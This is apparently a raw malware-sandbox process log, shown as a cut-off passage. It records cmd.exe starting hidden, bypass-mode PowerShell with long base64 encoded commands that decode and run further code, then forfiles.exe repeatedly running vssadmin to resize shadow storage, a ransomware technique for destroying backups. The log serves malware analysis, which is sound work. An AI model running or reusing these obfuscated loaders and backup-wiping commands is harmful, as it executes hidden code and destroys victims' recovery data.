XADQAbgBLAHkAZABpAFUARQBnAG4ASwB5AGQASwBKAHkAcwBuAFUAQwBjAHIASgAxAHAASABKAHkAcwBuAGUAVQBOAHMAYQB5AGMAcgBKADIAVgBHAFYAaQB0AGwAYgBHAHgAVwBUAFgAZABCAGQAVQA4AHYAYwBpAGMAcgBKADIAeABpAE0ARwBsADQAVQBTAGMAcgBKADMARQBuAEsAeQBkADAAUwBGAFUAdgBOAEMAYwByAEoAMABFAG4ASwB5AGQAbwBZADIAMABuAEsAeQBjAGcASgB5AHMAbgBLAFMAQQBzAEkAQwBjAHIASgAxAHMAbgBLAHkAZABKAGIAeQA1AEQAVAAwADEAdwBVAG0AVgBUAFUAMgBsAHYAVABpADUARABUADAAMQB3AGMAawBWAHoAVQAwAGwAdgBUAGsAMABuAEsAeQBkAFAASgB5AHMAbgBSAEcAVgBkAE8AagBvAG4ASwB5AGQAawBaAFMAYwByAEoAMgBOAHYASgB5AHMAbgBiAFYAQQBuAEsAeQBkAFMAUgBWAE4AVABJAEMAbABtAEoAeQBzAG4AVgBtAGMAZwBSAG0AOQB5AFIAUwBjAHIASgAwAEYARABKAHkAcwBuAGEASABzAGcAYgBrAFYAMwBMAFUAOQBpAEoAeQBzAG4AYQBtAFYAagBKAHkAcwBuAGQAQwBCAHoAZQBWAE4AVQBaAFUAMAB1AFMAVQA4AHUAYwAzAFIAeQBaAFUARgBOAEoAeQBzAG4AYwBtAFUAbgBLAHkAZABoAFIARQBWAHkASwBDAGMAcgBKAHkAQgBJAFIARwBwAGYATABDAGMAcgBKADEAdABUAGUAVgBOAFUAUgBXADAAbgBLAHkAYwB1AGQARwBWADQAZABDADQAbgBLAHkAZABsAFQAawBNAG4ASwB5AGQAdgBaAEUAbAB1AEoAeQBzAG4AUgB5AGMAcgBKADEAMAA2AE8AbQBGAHoAUQAyAGwASgBLAFMAQgA5AEkAQwBrAHUASgB5AHMAbgBjAGkAYwByAEoAMABWAEIASgB5AHMAbgBSAEYAUgB2AFoAVwA1AEUASwBDAGsAZwBaAGkAYwByAEoAMQBZAG4ASwB5AGQAbgBJAEMAWQBvAEoAeQBzAG4ASQBFAGcAbgBLAHkAZABFAGEAaQBjAHIASgAzAE4AbwBaAFcAeABzAFMAUwBjAHIASgAwAFIAYgBNAFYAMABuAEsAeQBjAHIAUwBFAFIAcQBjADIAaABGAGIARwB4AEoAUgBGAHMAeABNAHkAYwByAEoAMQAwAHIAYQBHAE4AdABKAHkAcwBuAGUARwBoAGoAYgBTAGsAbgBLAFMANQBTAFoAVgBCAE0AWQBVAE4AbABLAEMAaABiAFkAMABoAGgAVQBsADAAMwBNAGkAdABiAFkAMABoAGgAVQBsADAAMgBPAEMAdABiAFkAMABoAGgAVQBsADAAeABNAEQAWQBwAEwAQwBjAGsASgB5AGsAdQBVAG0AVgBRAFQARwBGAEQAWgBTAGcAbwBXADIATgBJAFkAVgBKAGQATQBUAEEAMABLADEAdABqAFMARwBGAFMAWABUAGsANQBLADEAdABqAFMARwBGAFMAWABUAEUAdwBPAFMAawBzAFcAMQBOADAAVQBtAGwATwBaADEAMQBiAFkAMABoAGgAVQBsADAAegBPAFMAawB1AFUAbQBWAFEAVABHAEYARABaAFMAZwBvAFcAMgBOAEkAWQBWAEoAZABNAFQAQQB5AEsAMQB0AGoAUwBHAEYAUwBYAFQAZwAyAEsAMQB0AGoAUwBHAEYAUwBYAFQARQB3AE0AeQBrAHMASgAzAHcAbgBLAFMAQQBwACIADQAKACQAdAAgAD0AIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQB0AGYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHMAKQApAA0ACgBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAHQA
◐瓌ᇂ㘔
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
113
2512
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC JAB1AD0AIgBLAEMAZwBuAEkAQwBoAE8AUgBTAGMAcgBKADEAYwBuAEsAeQBjAHQASgB5AHMAbgBUADAASgBxAFoAVQBOAFUASQBHAGsAbgBLAHkAZAB2AEwAawBOAFAASgB5AHMAbgBUAFYAQgBTAFoAVgBNAG4ASwB5AGQAegBTAFMAYwByAEoAMgA5AE8ATABtAFIARgBKAHkAcwBuAFIAaQBjAHIASgAwAHgAaABWAEMAYwByAEoAMgBVAG4ASwB5AGQAVABkAEYASgBGAFEAVwAwAG4ASwB5AGMAbwBJAEYAdABwAGIAeQA0AG4ASwB5AGQATgBKAHkAcwBuAFIAVwAxAFAAYwBsAGwAegBkAEgASgBGAEoAeQBzAG4AWQBTAGMAcgBKADAAMABuAEsAeQBkAGQAVwAyAE0AbgBLAHkAZAB2AFQAaQBjAHIASgAxAFkAbgBLAHkAZABsAFUAaQBjAHIASgAzAFIAZABPAGkAYwByAEoAegBvAG4ASwB5AGQARwBKAHkAcwBuAFUAawA4AG4ASwB5AGQAdABZAG0ARQBuAEsAeQBkAFQAUgBTAGMAcgBKAHoAWQAwAEoAeQBzAG4AYwB5AGMAcgBKADEAUgBTAEoAeQBzAG4AYQBVADUAbgBLAEMAQgBDAFUAeQBjAHIASgAwAEYATQBWAFMAYwByAEoAegBkAE0AUgBHADkASgBKAHkAcwBuAGQAMABWAFEASgB5AHMAbgBlAFYAWgBFAEoAeQBzAG4AVwBpAGMAcgBKADIAUQBuAEsAeQBkAEQAYgB5AGMAcgBKADMAQgBSAEoAeQBzAG4AYwBUAFEAbgBLAHkAZABwAFUARwBnADAASgB5AHMAbgBkAEQASgBRAFMAVQA0AG4ASwB5AGQAQgBTAHkAYwByAEoAMgBrAG4ASwB5AGQAawBKAHkAcwBuAGEAVwB0AE8AVgAzAEoAWgBKAHkAcwBuAE8AVQA0AHIAWgBDAGMAcgBKADAAcABUAFkAVwBRAG4ASwB5AGMAegBaAFMAYwByAEoAMgA1ADEASgB5AHMAbgBlAGsAdwBuAEsAeQBkAFMASgB5AHMAbgBiAEcANQB1AFIAMQBZAG4ASwB5AGMAeQBRADEAUgBsAGMARgBsADUASgB5AHMAbgBNAG0AcAB3AFYASABwAGgASgB5AHMAbgBjAFUAOQBEAGIAWABnADAATQBtAHgAbwBZAGkAYwByAEoAegBCAGgATQBTAGMAcgBKADEAWgBDAGQAVwBSAEwASgB5AHMAbgBPAFgAUgBKAGUAaQBjAHIASgAxAEIARgBUAG0AVgBwAEoAeQBzAG4AVwBtAGQAUQBWAEcARgBpAFYAUwBjAHIASgAyAFUAbgBLAHkAZABWAFUAUwBjAHIASgB6AGwAdwBlAG0AUgByAGIAbgBoAHQAYQAxAE0AbgBLAHkAZABSAE0AawAxAG4ASgB5AHMAbgBkADMAUgBxAFMAWABaAFEAYgBXADQAbgBLAHkAYwByAE0AQwBjAHIASgB6AGsANABlAFYARgBQAFQAQwBjAHIASgAxAEoARgBKAHkAcwBuAE8AVgBCAHMAUQBUAFoAMwBjAEUAbwBuAEsAeQBjAHcAVQBEAGMAbgBLAHkAZABZAFoAMABKAFMAZQBWAFUANQBlAFMAYwByAEoAeQA5AFIAVAAyAHQATgBhAFMAYwByAEoAMABGAG0AYQBEAGQAcgBUAEQATQBuAEsAeQBkAEcAWQBXAEoARwBKAHkAcwBuAGQARgBnADEAYQBXAEYAeQBXAFMAYwByAEoAMAB0AE4ATQBEAGQAVABWAFMAYwByAEoAMgAwAG4ASwB5AGQAeQBUAEYATgB1AFoARABSADYAWgBFADEAUABUAFMAYwByAEoAMQBOADQATQBDAGMAcgBKAHoAUgB6AFYAagBGAFkATwBDAGMAcgBKADAARgBCAFAAVAAxAEMAVQAwAEUAZwBLAFMAYwByAEoAeQB3AGcAVwAzAE4AWgBjAHkAYwByAEoAMwBSAGwAVABTADUASgBKAHkAcwBuAGIAeQA0AG4ASwB5AGQAagBiADAAMABuAEsAeQBkAFEAVQBtAFYAVABjADAAbABQAEoAeQBzAG4AYgBpADUARABUADAAMQB3AGMAawBWAHoAYwAwAGsAbgBLAHkAZAB2AEoAeQBzAG4AVABpAGMAcgBKADIAMABuAEsAeQBkAFAAUgBDAGMAcgBKADIAVgBkAEoAeQBzAG4ATwBqAHAAawBaAFUATgBQAGIAVgBCAFMAUgBYAE4AVABLAFUAawBuAEsAeQBkAEQAVwBTAGMAcgBKAHkAQQBsAEkASAB0AE8AUgBWAGMAdABKAHkAcwBuAFQAMABKAHEAWgBVAE4AVQBJAEcAbABQAEwAbgBNAG4ASwB5AGQAVQBKAHkAcwBuAGMAbQBVAG4ASwB5AGQAQgBKAHkAcwBuAFQAUwBjAHIASgAxAEoAbABZAFcAUQBuAEsAeQBkAEYASgB5AHMAbgBVAGkAYwByAEoAeQBnAGcAVAAzAGMAeABYAHkAdwBnAEoAeQBzAG4AVwAxAFIAbABXAEgAUQB1AEoAeQBzAG4AWgBXADQAbgBLAHkAZABqAFQAMgBSAEoAYgBtAGMAbgBLAHkAZABkAEoAeQBzAG4ATwBpAGMAcgBKAHoAbwBuAEsAeQBkAEIAVQAwAE4AcABhAFMAQQBwAEoAeQBzAG4ASQBIADAAZwBLAFMANABuAEsAeQBkAHkAUgBXAEUAbgBLAHkAZABFAFYAQwBjAHIASgAyADkARgBUAGsAUQBvAEsAUwBBAG4ASwB5AGQASgBKAHkAcwBuAFEAMQBrAG4ASwB5AGMAbQBJAEMAYwByAEoAeQBnAGcASgB5AHMAbgBUADMAYwB4AEoAeQBzAG4AVQBGAE4AbwBiADIAMQBsAFcAegBSAGQASwAwADkAMwBKAHkAcwBuAE0AVgBCAFQASgB5AHMAbgBTAEMAYwByAEoAMgA4AG4ASwB5AGQAdABKAHkAcwBuAFoAVgBzAG4ASwB5AGMAegBNAEYAMAByAFEAbABOAEIASgB5AHMAbgBlAEUASgBUAFEAUwBrAG4ASwBTAEEAdABRADEASgBGAGMARwB4AEIAUQAwAFUAbwBXADIATgBJAFkAVgBKAGQATgBqAFkAcgBXADIATgBJAFkAVgBKAGQATwBEAE0AcgBXADIATgBJAFkAVgBKAGQATgBqAFUAcABMAEYAdABqAFMARwBGAFMAWABUAE0ANQBJAEMAQQB0AFEAMQBKAEYAYwBHAHgAQgBRADAAVQBuAFQAMwBjAHgASgB5AHgAYgBZADAAaABoAFUAbAAwAHoATgBpADEAeQBaAFgAQgBNAFkAVwBOAGwASwBGAHQAagBTAEcARgBTAFgAVABjAHoASwAxAHQAagBTAEcARgBTAFgAVABZADMASwAxAHQAagBTAEcARgBTAFgAVABnADUASwBTAHgAYgBZADAAaABoAFUAbAAwAHgATQBqAFEAcABJAEgAdwBnAEoAaQBnAGcASgBIAEIAVABTAEcAOQB0AFoAVgBzADAAWABTAHMAawBjAEgATgBvAFQAMgAxAEYAVwB6AE0AMABYAFMAcwBuAFcAQwBjAHAAIgANAAoAJAB2ACAAPQAgAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAHQAZgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdQApACkADQAKAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAdgA=
ᇂ㘔
c:\windows\syswow64\cmd.exe
Created
Opened
Opened
Opened
Opened
Process
114
3532
cmd.exe
4068
cmd.exe
C:\WINDOWS\system32\cmd.exe /c PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC JAB3AD0AIgBLAEMAZwBuAEwAaQBnAG4ASwB5AGMAZwBlAGkAYwByAEoAMgBaAHUAVQBGAE4ASQBUAHkAYwByAEoAMAAxAEYASgB5AHMAbgBXAHoAUgBkAEoAeQBzAG4ASwAzAHAAbQBKAHkAcwBuAGIAbABCAHoAYQBDAGMAcgBKADAAOQB0AFIAVgBzAHoATQBGADAAcgBTADAANQBQAGUARQB0AE8AVAB5AGsAbwBiAGsAVQBuAEsAeQBkAFgATABTAGMAcgBKADAAOQBpAGEAawBVAG4ASwB5AGQAagBkAEMAYwByAEoAeQBBAGcAYQBXADgAdQBjADEAUgB5AFoAUwBjAHIASgAyAEUAbgBLAHkAZAB0AFUAbQBVAG4ASwB5AGQAaABSAEUAVQBuAEsAeQBkAFMASwBDAGcAZwBiAGkAYwByAEoAMABVAG4ASwB5AGQAWABMAFMAYwByAEoAMAA5AGkAYQBrAFUAbgBLAHkAZABqAGQAQwBCAFQASgB5AHMAbgBlAFYATgBVAEoAeQBzAG4AUgBXADAAdQBTAFcAOABuAEsAeQBjAHUAUQAwADgAbgBLAHkAZABOAEoAeQBzAG4AVQBDAGMAcgBKADEASQBuAEsAeQBkAEYAVQAxAE4AcABKAHkAcwBuAGIAMAA0AHUAUgBFAFUAbgBLAHkAZABHAEoAeQBzAG4AYgBFAEYAVQBaAFgATgBVAEoAeQBzAG4AVQBpAGMAcgBKADIAVgBoAGIAUwBjAHIASgB5AGcAZwBKAHkAcwBuAFcAMwBOAFoASgB5AHMAbgBjADMAUgBGAEoAeQBzAG4AYgBTADQAbgBLAHkAZABKAFQAeQBjAHIASgB5ADUAdABSAFcAMABuAEsAeQBkAFAAYwBsAGwAegBkAEYASgBsAFkAVQAxAGQASgB5AHMAbgBXADMATgA1AFUAMwBRAG4ASwB5AGQAbABKAHkAcwBuAFQAUwA0AG4ASwB5AGQARABiADAANQAyAFIAUwBjAHIASgAzAEoAVQBYAFQAbwA2AFIAbgBJAG4ASwB5AGQAUABKAHkAcwBuAFQAVwBKAEIASgB5AHMAbgBjAHkAYwByAEoAMABVADIATgBGAE4AVQBjAGkAYwByAEoAMgBsAE8AWgB5AGgATABUAGkAYwByAEoAMAA5AEkAVwBUAE4AawBRAHkAYwByAEoAMgA5AE4AZAB5AGMAcgBKADAAUgBKAFYAbQBZAG4ASwB5AGQASwBXAEcAaABVAGEAQwBjAHIASgAyAE0AbgBLAHkAYwB4AFQAeQBjAHIASgB6AGsAbgBLAHkAZAA1AEwAegBRAG4ASwB5AGQATgBTAGoASgAwAEoAeQBzAG4AWQBUAEoASABNAGkAYwByAEoAMQBsAFAAWQB5AGMAcgBKADIAMQBEAE0AMgA0AHoAUwBsAFkAMgBZADIANQBEAFYARwB0AG0AUwAyADUATQBKAHkAcwBuAFEAVwBoADIASgB5AHMAbgBRADAAawByAFIAMABKAHoASgB5AHMAbgBTADEAVgBEAE8AUwBjAHIASgAzAEYATwBlAFgARQBuAEsAeQBjADUAYwBTAGMAcgBKADMAQgBOAEoAeQBzAG4AWQB5AGMAcgBKAHoARQBuAEsAeQBkAHEAVwBVAGgAbABjADIAdwA0AGQAUwBjAHIASgB6AEYAeABjAFUASgBWAFoAVwBoAEUASgB5AHMAbgBhAGwASgBGAGQARABRAHkASgB5AHMAbgBiAEUAbABZAGQAMgA4AG4ASwB5AGQAaABWAEUANQA2AFkAawBkAFkAUgBTAGMAcgBKADIAeABuAFcAbgBsAEkAYQBGAGgAYQBRAFMAYwByAEoAMgBKADYAZQBrAGwARABUAGkAYwByAEoAMABGAE8ATgAzAFkAegBWAFgAQQA1AGMAagBSAEUAVQBDAGMAcgBKADEAcAByAEoAeQBzAG4ATQBXAGcAMQBMAHkAYwByAEoAMwBKAEcASgB5AHMAbgBNAFMAYwByAEoAegBkAGgAUwB5AGMAcgBKADEAVgBUAFcAUwBjAHIASgB6AFUAbgBLAHkAZABXAFoAawA5AG8ASgB5AHMAbgBiAFgATQBuAEsAeQBkAHUAUwBHAFYAMQBaAEMAYwByAEoAMQBwADIASgB5AHMAbgBUADEAVgBrAFYAMAB4AEcAVQBpAGMAcgBKAHoARgB4AGEAUwBjAHIASgAyAHcAbgBLAHkAZABaAGIAQwBjAHIASgAyAHAAcgBKAHkAcwBuAFQAQwBjAHIASgB6AEIAUwBPAEUAWgBtAFQAeQBjAHIASgAyAGcAbgBLAHkAZAB6AGIAUwBjAHIASgAwAE4ASQBkAFUATQBuAEsAeQBkAHEAYwBXAG8AbgBLAHkAYwA0AFAAVQB0AE8ASgB5AHMAbgBUAHkAYwByAEoAeQBrAHMASQBGAHMAbgBLAHkAZABwAEoAeQBzAG4AYgB5ADUARABiADAAMQB3AEoAeQBzAG4AVQBrAFYAVABVADAAawBuAEsAeQBkAHYAYgBpADUARABiADAAMQBRAGMAawBWAHoAYwB5AGMAcgBKADIAbAB2AFQAbQAwAG4ASwB5AGQAdgBaAEcAVgBkAE8AagBwAEUAUgBXAE4AdgBUAFgAQgB5AFIAWABOAHoASwBTAGsAZwBKAHkAcwBuAEwAQwBCAGIAVgBDAGMAcgBKADIAVgBZAGQAQwA1AEYAVABpAGMAcgBKADAATgB2AFIARwBsAHUAUgB5AGMAcgBKADEAMABuAEsAeQBjADYASgB5AHMAbgBPAGsARgB6AFkAMgBsAHAASwBTAEEAcABMAG4ASQBuAEsAeQBkAGwAWQBTAGMAcgBKADAAUgBVAGIAeQBjAHIASgAwAFYAdQBKAHkAcwBuAFoAQwBjAHIASgB5AGcAZwBLAFMAYwBwAEwAVgBKAGwAYwBHAHgAQgBZADIAVQBvAFcAMgBOAEkAWQBWAEoAZABNAFQASQB5AEsAMQB0AGoAUwBHAEYAUwBYAFQARQB3AE0AaQB0AGIAWQAwAGgAaABVAGwAMAB4AE0AVABBAHAATABGAHQAagBTAEcARgBTAFgAVABNADIASQBDADEAUwBaAFgAQgBzAFEAVwBOAGwASQBDAEEAbgBTADAANQBQAEoAeQB4AGIAWQAwAGgAaABVAGwAMAB6AE8AUwBsADgASQBDAFkAZwBLAEMAQQBrAFIAVQA1ADIATwBtAE4AUABUAFgATgBRAFoAVwBOAGIATgBDAHcAeQBOAEMAdwB5AE4AVgAwAHQAUwBrADkASgBUAGkAYwBuAEsAUQA9AD0AIgANAAoAJAB4ACAAPQAgAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAHQAZgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdwApACkADQAKAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAeAA=
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
115
1692
powershell.exe
3532
powershell.exe
PoWeRsHeLl -execu BypASS -nolOGo -nopr -noniNterACT -wInD hIdDen -EnC JAB3AD0AIgBLAEMAZwBuAEwAaQBnAG4ASwB5AGMAZwBlAGkAYwByAEoAMgBaAHUAVQBGAE4ASQBUAHkAYwByAEoAMAAxAEYASgB5AHMAbgBXAHoAUgBkAEoAeQBzAG4ASwAzAHAAbQBKAHkAcwBuAGIAbABCAHoAYQBDAGMAcgBKADAAOQB0AFIAVgBzAHoATQBGADAAcgBTADAANQBQAGUARQB0AE8AVAB5AGsAbwBiAGsAVQBuAEsAeQBkAFgATABTAGMAcgBKADAAOQBpAGEAawBVAG4ASwB5AGQAagBkAEMAYwByAEoAeQBBAGcAYQBXADgAdQBjADEAUgB5AFoAUwBjAHIASgAyAEUAbgBLAHkAZAB0AFUAbQBVAG4ASwB5AGQAaABSAEUAVQBuAEsAeQBkAFMASwBDAGcAZwBiAGkAYwByAEoAMABVAG4ASwB5AGQAWABMAFMAYwByAEoAMAA5AGkAYQBrAFUAbgBLAHkAZABqAGQAQwBCAFQASgB5AHMAbgBlAFYATgBVAEoAeQBzAG4AUgBXADAAdQBTAFcAOABuAEsAeQBjAHUAUQAwADgAbgBLAHkAZABOAEoAeQBzAG4AVQBDAGMAcgBKADEASQBuAEsAeQBkAEYAVQAxAE4AcABKAHkAcwBuAGIAMAA0AHUAUgBFAFUAbgBLAHkAZABHAEoAeQBzAG4AYgBFAEYAVQBaAFgATgBVAEoAeQBzAG4AVQBpAGMAcgBKADIAVgBoAGIAUwBjAHIASgB5AGcAZwBKAHkAcwBuAFcAMwBOAFoASgB5AHMAbgBjADMAUgBGAEoAeQBzAG4AYgBTADQAbgBLAHkAZABKAFQAeQBjAHIASgB5ADUAdABSAFcAMABuAEsAeQBkAFAAYwBsAGwAegBkAEYASgBsAFkAVQAxAGQASgB5AHMAbgBXADMATgA1AFUAMwBRAG4ASwB5AGQAbABKAHkAcwBuAFQAUwA0AG4ASwB5AGQARABiADAANQAyAFIAUwBjAHIASgAzAEoAVQBYAFQAbwA2AFIAbgBJAG4ASwB5AGQAUABKAHkAcwBuAFQAVwBKAEIASgB5AHMAbgBjAHkAYwByAEoAMABVADIATgBGAE4AVQBjAGkAYwByAEoAMgBsAE8AWgB5AGgATABUAGkAYwByAEoAMAA5AEkAVwBUAE4AawBRAHkAYwByAEoAMgA5AE4AZAB5AGMAcgBKADAAUgBKAFYAbQBZAG4ASwB5AGQASwBXAEcAaABVAGEAQwBjAHIASgAyAE0AbgBLAHkAYwB4AFQAeQBjAHIASgB6AGsAbgBLAHkAZAA1AEwAegBRAG4ASwB5AGQATgBTAGoASgAwAEoAeQBzAG4AWQBUAEoASABNAGkAYwByAEoAMQBsAFAAWQB5AGMAcgBKADIAMQBEAE0AMgA0AHoAUwBsAFkAMgBZADIANQBEAFYARwB0AG0AUwAyADUATQBKAHkAcwBuAFEAVwBoADIASgB5AHMAbgBRADAAawByAFIAMABKAHoASgB5AHMAbgBTADEAVgBEAE8AUwBjAHIASgAzAEYATwBlAFgARQBuAEsAeQBjADUAYwBTAGMAcgBKADMAQgBOAEoAeQBzAG4AWQB5AGMAcgBKAHoARQBuAEsAeQBkAHEAVwBVAGgAbABjADIAdwA0AGQAUwBjAHIASgB6AEYAeABjAFUASgBWAFoAVwBoAEUASgB5AHMAbgBhAGwASgBGAGQARABRAHkASgB5AHMAbgBiAEUAbABZAGQAMgA4AG4ASwB5AGQAaABWAEUANQA2AFkAawBkAFkAUgBTAGMAcgBKADIAeABuAFcAbgBsAEkAYQBGAGgAYQBRAFMAYwByAEoAMgBKADYAZQBrAGwARABUAGkAYwByAEoAMABGAE8ATgAzAFkAegBWAFgAQQA1AGMAagBSAEUAVQBDAGMAcgBKADEAcAByAEoAeQBzAG4ATQBXAGcAMQBMAHkAYwByAEoAMwBKAEcASgB5AHMAbgBNAFMAYwByAEoAegBkAGgAUwB5AGMAcgBKADEAVgBUAFcAUwBjAHIASgB6AFUAbgBLAHkAZABXAFoAawA5AG8ASgB5AHMAbgBiAFgATQBuAEsAeQBkAHUAUwBHAFYAMQBaAEMAYwByAEoAMQBwADIASgB5AHMAbgBUADEAVgBrAFYAMAB4AEcAVQBpAGMAcgBKAHoARgB4AGEAUwBjAHIASgAyAHcAbgBLAHkAZABaAGIAQwBjAHIASgAyAHAAcgBKAHkAcwBuAFQAQwBjAHIASgB6AEIAUwBPAEUAWgBtAFQAeQBjAHIASgAyAGcAbgBLAHkAZAB6AGIAUwBjAHIASgAwAE4ASQBkAFUATQBuAEsAeQBkAHEAYwBXAG8AbgBLAHkAYwA0AFAAVQB0AE8ASgB5AHMAbgBUAHkAYwByAEoAeQBrAHMASQBGAHMAbgBLAHkAZABwAEoAeQBzAG4AYgB5ADUARABiADAAMQB3AEoAeQBzAG4AVQBrAFYAVABVADAAawBuAEsAeQBkAHYAYgBpADUARABiADAAMQBRAGMAawBWAHoAYwB5AGMAcgBKADIAbAB2AFQAbQAwAG4ASwB5AGQAdgBaAEcAVgBkAE8AagBwAEUAUgBXAE4AdgBUAFgAQgB5AFIAWABOAHoASwBTAGsAZwBKAHkAcwBuAEwAQwBCAGIAVgBDAGMAcgBKADIAVgBZAGQAQwA1AEYAVABpAGMAcgBKADAATgB2AFIARwBsAHUAUgB5AGMAcgBKADEAMABuAEsAeQBjADYASgB5AHMAbgBPAGsARgB6AFkAMgBsAHAASwBTAEEAcABMAG4ASQBuAEsAeQBkAGwAWQBTAGMAcgBKADAAUgBVAGIAeQBjAHIASgAwAFYAdQBKAHkAcwBuAFoAQwBjAHIASgB5AGcAZwBLAFMAYwBwAEwAVgBKAGwAYwBHAHgAQgBZADIAVQBvAFcAMgBOAEkAWQBWAEoAZABNAFQASQB5AEsAMQB0AGoAUwBHAEYAUwBYAFQARQB3AE0AaQB0AGIAWQAwAGgAaABVAGwAMAB4AE0AVABBAHAATABGAHQAagBTAEcARgBTAFgAVABNADIASQBDADEAUwBaAFgAQgBzAFEAVwBOAGwASQBDAEEAbgBTADAANQBQAEoAeQB4AGIAWQAwAGgAaABVAGwAMAB6AE8AUwBsADgASQBDAFkAZwBLAEMAQQBrAFIAVQA1ADIATwBtAE4AUABUAFgATgBRAFoAVwBOAGIATgBDAHcAeQBOAEMAdwB5AE4AVgAwAHQAUwBrADkASgBUAGkAYwBuAEsAUQA9AD0AIgANAAoAJAB4ACAAPQAgAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAHQAZgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdwApACkADQAKAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAeAA=
C:\
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Process
116
3912
forfiles.exe
1692
forfiles.exe
"C:\WINDOWS\system32\forfiles.exe" /c "cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded"
C:\
c:\windows\syswow64\forfiles.exe
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Child_Of
Process
117
4420
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
118
4992
vssadmin.exe
4420
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
119
3996
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
120
3420
vssadmin.exe
3996
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
121
3620
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
122
2920
vssadmin.exe
3620
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
123
5020
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
124
4636
vssadmin.exe
5020
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
125
4656
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
126
4660
vssadmin.exe
4656
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
127
904
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
128
4904
vssadmin.exe
904
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
129
3464
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
130
3456
vssadmin.exe
3464
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
131
5028
cmd.exe
3912
cmd.exe
/c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Process
132
4884
vssadmin.exe
5028
vssadmin.exe
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\
c:\windows\syswow64\vssadmin.exe
Process
133
4012
